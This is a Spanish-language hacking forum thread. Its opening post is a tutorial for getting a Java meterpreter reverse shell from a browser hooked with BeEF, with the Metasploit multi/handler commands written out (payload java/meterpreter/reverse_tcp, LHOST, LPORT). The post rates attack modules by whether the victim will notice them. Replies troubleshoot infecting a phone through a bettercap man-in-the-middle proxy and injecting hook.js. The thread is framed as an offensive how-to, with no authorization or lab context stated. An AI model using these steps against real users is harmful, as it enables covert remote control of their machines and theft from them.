Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Sesión de meterpreter con BeEF y metasploit (exploit java)

  • 4 Respuestas
  • 5005 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Lonewolf

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 2
  • Mente despierta. Cuerpo dormido.
    • Ver Perfil
« en: Octubre 13, 2016, 10:52:33 am »
Hola, en la entrada de hoy continuaremos con la entrada enterior en la que les prometi que obtendriamos nuestra estupida y sensual sesion de meterpreter , para que entiendan mejor les recomiendo leer la entrada anterior : https://underc0de.org/foro/hacking/infectar-navegadores-mediante-bettercap-y-beef/.

Bueno , en este caso vamos a obtener nuestra shell mediande un payload para java que BeEF trae en sus opciones de post-explotación que cabe recalcar que no son pocas  :o .

En la entrada anterior habíamos logrado infectar un navegador de un dispositivo android , en este caso el navegador infectado estara corriendonen una maquina con Maicrosó Guindous 7 ( Windows 7 ... lo se mis chistes son malos, no me dejen  :'( ) . Pero no se asusten el procedimiento de infección es exactamente el mismo.
Comenzemos desde un punto en el que tenemos un navegador infectado con BeEF:




Ok, veamos que podemos hacer.




Antes de seguir tenemos que entender que significan los puntos de colores que tenemos adjuntados a cada opcion:
  • Verde: El objetivo es vulnerable y el ataque no sera persivido por la victima.
  • Naranja: El objetivo es vulnerable pero su ejecución sera advertida por el usuario.
  • Gris: No esta comprobado que la victima sea vulnerable.
  • Rojo: La victima no es vulnerable.



Para ejecutar El modulo solo es nesesario darle click y configurar los parametros que tendremos en la parte derecha de la ventana.
Luego de configurar nuestro payload en BeEF vamos a abrir una nueva terminal , vamos a ejecutar metasploit y poner un handler en escucha:

  • Iniciar metasploit: "msfconsole"
  • Seleccionar nuestro exploit: "use exploit/multi/handler"
  • Configurar nuestro Payload: "set PAYLOAD java/meterpreter/reverse_tcp"
  • Colocar nuestra ip en escucha: "set LHOST 192.168.0.104 (esto puede variar según cada caso)"
  • Colocar un puerto en escucha: "set LPORT 6666" Pueden usar cualquier puerto que no este en uso.



Obiamente tenemos que colocar los mismos datos que con los que configuramos el modulo java en BeEF




Ahora colocamos el handler en escucha con el comando "exploit" o "run"




Seguidamente por el lado de BeEF lanzamos el modulo que teniamos configurado y tendriamos que obtener nuestra estupida y sensual sesión de meterpreter .




Me despido hasta la proxima entrada.



Fuente: "http://www.gr2dest.org/ataques-a-traves-del-navegador-beef-xss/"



« Última modificación: Octubre 13, 2016, 12:16:54 pm por HATI »
"Todos tenemos un defecto , un error en nuestro código "

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 372
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #1 en: Octubre 13, 2016, 11:04:23 am »
Todavia no pude infectar mi propio celular con el bettercap del otro post. Esta bien configurado todo, es como que mi celular se queda sin internet, no logra conectar a las paginas. Por ende no lo puedo infectar, porque no logra conectar al hook del beef.
Si entro directamente si, pero eso es otro tema.
Hoy cuando llego a casa, pruebo hacer lo del meterpreter nuevamente, viste que podes integrar todo el metasploit en el beef no? - Y creo que tambien el armitage/cobalt strike-
Pikaa~


Desconectado Lonewolf

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 2
  • Mente despierta. Cuerpo dormido.
    • Ver Perfil
« Respuesta #2 en: Octubre 13, 2016, 11:17:32 am »
Todavia no pude infectar mi propio celular con el bettercap del otro post. Esta bien configurado todo, es como que mi celular se queda sin internet, no logra conectar a las paginas. Por ende no lo puedo infectar, porque no logra conectar al hook del beef.
Si entro directamente si, pero eso es otro tema.
Hoy cuando llego a casa, pruebo hacer lo del meterpreter nuevamente, viste que podes integrar todo el metasploit en el beef no? - Y creo que tambien el armitage/cobalt strike-
Hola Pakachu , no le he probado con cobalt strike pero vi en algun post perdido por ahi que si se puede jaja , y por lo general si se puede con metasploit tambiense podra con armitage ya que solo es un entorno grafico para dicho framework , lo que me dices sobre tu problema con tu android si es que estas haciendo todo correctamente se me ocurren 2 posibles causas :
1- Si entras a alguna pagina con HSTS (https) podria que dicho protocolo no te deje interceptar el trafico e inyectar el hook.js , para solucionarlo podrias probar con una pagina http como con la que probe en el post .
2- Existe la probabilidad se que el ancho de banda de tu pc este un poco sobrecargado y por eso podria ser que el celular no te este dando internet correctamente , podrias probar si bettercap finciona simplemente con "bettercap -T ipvictima --proxy" la verdad que no se me ocurre nada mas , saludos
« Última modificación: Octubre 13, 2016, 11:19:27 am por Lonewolf »
"Todos tenemos un defecto , un error en nuestro código "

Desconectado puntoCL

  • *
  • Moderator
  • *****
  • Mensajes: 279
  • Actividad:
    0%
  • Reputación 6
  • Magallanes no es chile :D
    • Ver Perfil
« Respuesta #3 en: Octubre 13, 2016, 12:40:31 pm »
@PikachuDorado

esto lo que tu estabas buscando?

« Última modificación: Octubre 13, 2016, 12:45:53 pm por puntoCL »




Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 372
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #4 en: Octubre 13, 2016, 03:31:00 pm »
Exactamente eso, no habia tenido tiempo en buscarlo. Gracias .cl (:
Pikaa~


 

¿Te gustó el post? COMPARTILO!



"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 8934
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Creando un Exploit paso a paso

Iniciado por Stiuvert

Respuestas: 6
Vistas: 5750
Último mensaje Abril 08, 2012, 09:20:42 pm
por Survivor
Creando un exploit paso a paso :D

Iniciado por RooT_Shell

Respuestas: 5
Vistas: 5171
Último mensaje Julio 17, 2010, 08:13:30 pm
por domino
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 5632
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Iniciado por Aryenal.Bt

Respuestas: 11
Vistas: 8455
Último mensaje Noviembre 20, 2012, 12:25:34 am
por BCKTR1X